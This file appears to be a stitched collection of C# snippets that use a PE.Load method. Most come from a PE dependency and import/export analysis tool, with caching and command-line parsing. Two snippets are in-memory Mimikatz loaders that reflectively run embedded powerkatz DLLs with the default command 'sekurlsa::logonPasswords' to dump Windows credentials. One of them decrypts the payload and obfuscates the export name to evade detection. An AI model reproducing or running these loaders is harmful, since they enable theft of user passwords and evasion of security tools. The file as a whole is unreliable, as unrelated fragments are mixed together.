static bool TestFilepath(string Filepath, Demangler SymPrv) { PE Pe = new PE(Filepath); if (!Pe.Load()) { Console.Error.WriteLine("[x] Could not load file {0:s} as a PE", Filepath); return(false); } foreach (PeExport Export in Pe.GetExports()) { if (Export.Name.Length > 0) { Console.Write("\t Export : {0:s} -> ", Export.Name); Console.Out.Flush(); Console.WriteLine("{0:s}", SymPrv.UndecorateName(Export.Name)); } } foreach (PeImportDll DllImport in Pe.GetImports()) { foreach (PeImport Import in DllImport.ImportList) { if (!Import.ImportByOrdinal) { Console.Write("\t Import from {0:s} : {1:s} -> ", DllImport.Name, Import.Name); Console.Out.Flush(); Console.WriteLine("{0:s}", SymPrv.UndecorateName(Import.Name)); } } } return(true); }
public PE GetBinary(string PePath) { if (!File.Exists(PePath)) { return(null); } string PeHash = GetBinaryHash(PePath); // Cache "miss" bool hit = BinaryDatabase.ContainsKey(PeHash); if (!hit) { string DestFilePath = Path.Combine(BinaryCacheFolderPath, PeHash); if (DestFilePath != PePath) { File.Copy(PePath, DestFilePath, true); } PE NewShadowBinary = new PE(DestFilePath); NewShadowBinary.Load(); LruCache.Add(PeHash); BinaryDatabase.Add(PeHash, NewShadowBinary); } // Cache "Hit" UpdateLru(PeHash); PE ShadowBinary = BinaryDatabase[PeHash]; ShadowBinary.Filepath = PePath; return(ShadowBinary); }
public override PE GetBinary(string PePath) { PE pefile = new PE(PePath); pefile.Load(); return(pefile); }
public PE GetBinary(string PePath) { Debug.WriteLine(String.Format("Attempt to load : {0:s}", PePath), "BinaryCache"); if (!NativeFile.Exists(PePath)) { Debug.WriteLine(String.Format("File not present on the filesystem : {0:s} ", PePath), "BinaryCache"); return(null); } string Fullpath = Path.GetFullPath(PePath); if (FilepathDatabase.ContainsKey(Fullpath)) { // TODO : update LRU cache PE sShadowBinary = FilepathDatabase[Fullpath]; sShadowBinary.Filepath = Fullpath; return(sShadowBinary); } string PeHash = GetBinaryHash(PePath); Debug.WriteLine(String.Format("File {0:s} hash : {1:s} ", PePath, PeHash), "BinaryCache"); // A sync lock is mandatory here in order not to load twice the // same binary from two differents workers lock (BinaryDatabaseLock) { bool hit = BinaryDatabase.ContainsKey(PeHash); // Cache "miss" if (!hit) { string DestFilePath = Path.Combine(BinaryCacheFolderPath, PeHash); if (!File.Exists(DestFilePath) && (DestFilePath != PePath)) { Debug.WriteLine(String.Format("FileCopy from {0:s} to {1:s}", PePath, DestFilePath), "BinaryCache"); NativeFile.Copy(PePath, DestFilePath); } PE NewShadowBinary = new PE(DestFilePath); NewShadowBinary.Load(); LruCache.Add(PeHash); BinaryDatabase.Add(PeHash, NewShadowBinary); FilepathDatabase.Add(Fullpath, NewShadowBinary); } } // Cache "Hit" UpdateLru(PeHash); PE ShadowBinary = BinaryDatabase[PeHash]; ShadowBinary.Filepath = Path.GetFullPath(PePath); // convert any paths to an absolute one. Debug.WriteLine(String.Format("File {0:s} loaded from {1:s}", PePath, Path.Combine(BinaryCacheFolderPath, PeHash)), "BinaryCache"); return(ShadowBinary); }
/// <summary> /// Loads the Mimikatz PE with `PE.Load()` and executes a chosen Mimikatz command. /// </summary> /// <param name="Command">Mimikatz command to be executed.</param> /// <returns>Mimikatz output.</returns> public static string Command(string Command = "privilege::debug sekurlsa::logonPasswords") { // Console.WriteLine(String.Join(",", System.Reflection.Assembly.GetExecutingAssembly().GetManifestResourceNames())); if (MimikatzPE == null) { string[] manifestResources = System.Reflection.Assembly.GetExecutingAssembly().GetManifestResourceNames(); if (IntPtr.Size == 4 && MimikatzPE == null) { if (PEBytes32 == null) { PEBytes32 = Utilities.GetEmbeddedResourceBytes("powerkatz_x86.dll"); if (PEBytes32 == null) { return(""); } } MimikatzPE = PE.Load(PEBytes32); } else if (IntPtr.Size == 8 && MimikatzPE == null) { if (PEBytes64 == null) { PEBytes64 = Utilities.GetEmbeddedResourceBytes("powerkatz_x64.dll"); if (PEBytes64 == null) { return(""); } } MimikatzPE = PE.Load(PEBytes64); } } if (MimikatzPE == null) { return(""); } IntPtr functionPointer = MimikatzPE.GetFunctionExport("powershell_reflective_mimikatz"); if (functionPointer == IntPtr.Zero) { return(""); } MimikatzType mimikatz = (MimikatzType)Marshal.GetDelegateForFunctionPointer(functionPointer, typeof(MimikatzType)); IntPtr input = Marshal.StringToHGlobalUni(Command); try { IntPtr output = mimikatz(input); return(Marshal.PtrToStringUni(output)); } catch (Exception e) { Console.Error.WriteLine("MimikatzException: " + e.Message + e.StackTrace); return(""); } }
static void Main(string[] args) { // always the first call to make Phlib.InitializePhLib(); int recursion_depth = 0; bool early_exit = false; bool show_help = false; bool export_as_json = false; DumpCommand command = null; OptionSet opts = new OptionSet() { { "h|help", "show this message and exit", v => show_help = v != null }, { "json", "Export results in json format", v => export_as_json = v != null }, { "d|depth=", "limit recursion depth when analyisng loaded modules or dependency chain. Default value is infinite", (int v) => recursion_depth = v }, { "knowndll", "List all known dlls", v => { DumpKnownDlls(GetObjectPrinter(export_as_json)); early_exit = true; } }, { "apisets", "List apisets redirections", v => { DumpApiSets(GetObjectPrinter(export_as_json)); early_exit = true; } }, { "apisetsdll", "List apisets redirections from apisetschema.dll", v => command = DumpApiSets }, { "manifest", "show manifest information embedded in PE file", v => command = DumpManifest }, { "sxsentries", "dump all of FILE's sxs dependencies", v => command = DumpSxsEntries }, { "imports", "dump FILE imports", v => command = DumpImports }, { "exports", "dump FILE exports", v => command = DumpExports }, { "chain", "dump FILE whole dependency chain", v => command = DumpDependencyChain }, { "modules", "dump FILE resolved modules", v => command = DumpModules }, }; List <string> eps = opts.Parse(args); if (early_exit) { return; } if ((show_help) || (args.Length == 0) || (command == null)) { DumpUsage(); return; } String FileName = eps[0]; //Console.WriteLine("[-] Loading file {0:s} ", FileName); PE Pe = new PE(FileName); if (!Pe.Load()) { Console.Error.WriteLine("[x] Could not load file {0:s} as a PE", FileName); return; } command(Pe, GetObjectPrinter(export_as_json), recursion_depth); }
/// <summary> /// Get the list of dependency dll /// </summary> /// <returns>PE import list</returns> public List <PeImportDll> GetImportDllList() { if (filename == "") { throw new ArgumentNullException("filename"); } localPE = new PE(filename); if (!localPE.Load()) { throw new BadImageFormatException("Cannot Load PE File"); } return(localPE.GetImports()); }
public PE GetBinary(string PePath) { if (!File.Exists(PePath)) { return(null); } string PeHash = GetBinaryHash(PePath); // A sync lock is mandatory here in order not to load twice the // same binary from two differents workers lock (BinaryDatabaseLock) { bool hit = BinaryDatabase.ContainsKey(PeHash); // Cache "miss" if (!hit) { string DestFilePath = Path.Combine(BinaryCacheFolderPath, PeHash); if (!File.Exists(DestFilePath) && (DestFilePath != PePath)) { File.Copy(PePath, DestFilePath, true); } PE NewShadowBinary = new PE(DestFilePath); NewShadowBinary.Load(); LruCache.Add(PeHash); BinaryDatabase.Add(PeHash, NewShadowBinary); } } // Cache "Hit" UpdateLru(PeHash); PE ShadowBinary = BinaryDatabase[PeHash]; ShadowBinary.Filepath = PePath; return(ShadowBinary); }
static void Main(string[] args) { String FileName = null; var ProgramArgs = ParseArgs(args); Action <IPrettyPrintable> ObjectPrinter = PrettyPrinter; // always the first call to make Phlib.InitializePhLib(); if (ProgramArgs.ContainsKey("file")) { FileName = ProgramArgs["file"]; } if (ProgramArgs.ContainsKey("-json")) { ObjectPrinter = JsonPrinter; } // no need to load PE for those commands if ((args.Length == 0) || ProgramArgs.ContainsKey("-h") || ProgramArgs.ContainsKey("-help")) { DumpUsage(); return; } if (ProgramArgs.ContainsKey("-knowndll")) { DumpKnownDlls(ObjectPrinter); return; } if (ProgramArgs.ContainsKey("-apisets")) { DumpApiSets(ObjectPrinter); return; } //Console.WriteLine("[-] Loading file {0:s} ", FileName); PE Pe = new PE(FileName); if (!Pe.Load()) { Console.Error.WriteLine("[x] Could not load file {0:s} as a PE", FileName); return; } if (ProgramArgs.ContainsKey("-manifest")) { DumpManifest(Pe, ObjectPrinter); } else if (ProgramArgs.ContainsKey("-sxsentries")) { DumpSxsEntries(Pe, ObjectPrinter); } else if (ProgramArgs.ContainsKey("-imports")) { DumpImports(Pe, ObjectPrinter); } else if (ProgramArgs.ContainsKey("-exports")) { DumpExports(Pe, ObjectPrinter); } else if (ProgramArgs.ContainsKey("-chain")) { DumpDependencyChain(Pe, ObjectPrinter); } else if (ProgramArgs.ContainsKey("-modules")) { DumpModules(Pe, ObjectPrinter); } }
static void Main(string[] args) { Phlib.InitializePhLib(); var ProgramArgs = ParseArgs(args); String FileName = null; if (ProgramArgs.ContainsKey("file")) { FileName = ProgramArgs["file"]; } if (ProgramArgs.ContainsKey("-verbose")) { VerboseOutput = true; } // no need to load PE for those commands if ((args.Length == 0) || ProgramArgs.ContainsKey("-h") || ProgramArgs.ContainsKey("-help")) { DumpUsage(); return; } if (ProgramArgs.ContainsKey("-knowndll")) { DumpKnownDlls(); return; } if (ProgramArgs.ContainsKey("-apisets")) { DumpApiSets(); return; } VerboseWriteLine("[-] Loading file {0:s} ", FileName); PE Pe = new PE(FileName); if (!Pe.Load()) { Console.Error.WriteLine("[x] Could not load file {0:s} as a PE", FileName); return; } if (ProgramArgs.ContainsKey("-manifest")) { DumpManifest(Pe); } if (ProgramArgs.ContainsKey("-sxsentries")) { DumpSxsEntries(Pe); } if (ProgramArgs.ContainsKey("-imports")) { DumpImports(Pe); } if (ProgramArgs.ContainsKey("-exports")) { DumpExports(Pe); } }
/// <summary> /// Loads the Mimikatz PE with `PE.Load()` and executes a chosen Mimikatz command. /// </summary> /// <param name="Command">Mimikatz command to be executed.</param> /// <returns>Mimikatz output.</returns> public static string Command(string Command = "privilege::debug sekurlsa::logonPasswords") { // Console.WriteLine(String.Join(",", System.Reflection.Assembly.GetExecutingAssembly().GetManifestResourceNames())); if (MimikatzPE == null) { if (IntPtr.Size == 8) //x64 Unpack And Execute { //x64 Unpack And Execute Console.WriteLine("x64 !! Gocha"); PEBytes64 = Utilities.Decrypt(NonInteractiveMimikatz.Properties.Resources.x64powerkatz); MimikatzPE = PE.Load(PEBytes64); } else if (IntPtr.Size == 4) { //x86 Unpack And Execute Console.WriteLine("x86 !! Gocha"); PEBytes32 = Utilities.Decrypt(NonInteractiveMimikatz.Properties.Resources.Win32powerkatz); MimikatzPE = PE.Load(PEBytes32); } } if (MimikatzPE == null) { return(""); } IntPtr functionPointer = MimikatzPE.GetFunctionExport("pAAAowershell_".Replace("AAA", "") + " reflective_".TrimStart() + " mimikatz".Trim()); if (functionPointer == IntPtr.Zero) { return(""); } MimikatzType mimikatz = (MimikatzType)Marshal.GetDelegateForFunctionPointer(functionPointer, typeof(MimikatzType)); IntPtr input = Marshal.StringToHGlobalUni(Command); try { IntPtr output = IntPtr.Zero; Thread t = new Thread(() => { try { output = mimikatz(input); } catch (Exception e) { Console.Error.WriteLine("MimikatzException: " + e.Message + e.StackTrace); } }); t.Start(); t.Join(); Marshal.FreeHGlobal(input); if (output == IntPtr.Zero) { return(""); } string stroutput = Marshal.PtrToStringUni(output); PInvoke.Win32.Kernel32.LocalFree(output); return(stroutput); } catch (Exception e) { Console.Error.WriteLine("MimikatzException: " + e.Message + e.StackTrace); return(""); } }
static void Main(string[] args) { // always the first call to make Phlib.InitializePhLib(); int recursion_depth = 0; bool early_exit = false; bool show_help = false; bool export_as_json = false; bool use_bin_cache = false; DumpCommand command = null; OptionSet opts = new OptionSet() { { "h|help", "show this message and exit", v => show_help = v != null }, { "json", "Export results in json format", v => export_as_json = v != null }, { "cache", "load and use binary cache to prevent dll file locking", v => use_bin_cache = v != null }, { "d|depth=", "limit recursion depth when analysing loaded modules or dependency chain. Default value is infinite", (int v) => recursion_depth = v }, { "knowndll", "List all known dlls", v => { DumpKnownDlls(GetObjectPrinter(export_as_json)); early_exit = true; } }, { "apisets", "List apisets redirections", v => { DumpApiSets(GetObjectPrinter(export_as_json)); early_exit = true; } }, { "apisetsdll", "List apisets redirections from apisetschema <FILE>", v => command = DumpApiSets }, { "manifest", "show manifest information embedded in <FILE>", v => command = DumpManifest }, { "sxsentries", "dump all of <FILE>'s sxs dependencies", v => command = DumpSxsEntries }, { "imports", "dump <FILE> imports", v => command = DumpImports }, { "exports", "dump <FILE> exports", v => command = DumpExports }, { "assemblyrefs", "dump <FILE> assemblyrefs", v => command = DumpAssemblyReferences }, { "modulerefs", "dump <FILE> modulerefs", v => command = DumpModuleReferences }, { "chain", "dump <FILE> whole dependency chain", v => command = DumpDependencyChain }, { "modules", "dump <FILE> resolved modules", v => command = DumpModules }, }; List <string> eps = opts.Parse(args); if (early_exit) { return; } if ((show_help) || (args.Length == 0) || (command == null)) { DumpUsage(); return; } BinaryCache.InitializeBinaryCache(use_bin_cache); if (eps.Count == 0) { Console.Error.WriteLine("[x] Command {0:s} needs to have a PE <FILE> argument", command.Method.Name); Console.Error.WriteLine(""); DumpUsage(); return; } String FileName = eps[0]; if (!NativeFile.Exists(FileName)) { Console.Error.WriteLine("[x] Could not find file {0:s} on disk", FileName); return; } Debug.WriteLine("[-] Loading file {0:s} ", FileName); PE Pe = new PE(FileName); if (!Pe.Load()) { Console.Error.WriteLine("[x] Could not load file {0:s} as a PE", FileName); return; } command(Pe, GetObjectPrinter(export_as_json), recursion_depth); }